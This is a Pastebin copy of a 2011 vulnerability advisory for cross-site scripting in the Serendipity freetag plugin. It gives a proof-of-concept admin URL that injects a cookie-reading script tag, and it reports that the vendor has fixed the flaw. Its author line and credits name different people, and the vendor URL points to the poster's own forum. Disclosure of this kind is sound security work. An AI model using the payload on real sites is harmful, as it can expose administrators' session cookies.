Advertisement
ugo22g

XSS 1

Sep 26th, 2011
201
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.25 KB | None | 0 0
  1. Advisory: Serendipity freetag plugin 'serendipity[tagview]' Cross-Site Scripting vulnerability
  2. Advisory ID: SSCHADV2011-016
  3. Author: h4(k3r
  4. Affected Software: Successfully tested on Serendipity 1.5.5
  5. Vendor URL: http://h4ck3r.ze-forum.com
  6. Vendor Status: fixed
  7. CVE-ID: -
  8.  
  9. ==========================
  10. Vulnerability Description:
  11. ==========================
  12.  
  13. The freetag plugin parameter "serendipity[tagview]" in Serendipity backend is prone to a Cross-Site Scripting vulnerability
  14.  
  15. ==================
  16. Technical Details:
  17. ==================
  18.  
  19. http://<target>/serendipity/serendipity_admin?serendipity[adminModule]=event_display&serendipity[adminAction]=managetags&serendipity[tagview]=<script>alert(document.cookie)</script>
  20.  
  21. =========
  22. Solution:
  23. =========
  24.  
  25. Update to the latest version
  26.  
  27. ====================
  28. Disclosure Timeline:
  29. ====================
  30.  
  31. 22-Sep-2011 - informed developers
  32. 23-Sep-2011 - fixed in the latest version
  33. 25-Sep-2011 - release date of this security advisory
  34. 25-Sep-2011 - post on BugTraq
  35.  
  36. ========
  37. Credits:
  38. ========
  39.  
  40. Vulnerability found and advisory written by Stefan Schurtz.
  41.  
  42. ===========
  43. References:
  44. ===========
  45. http://h4ck3r.ze-forum.com
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement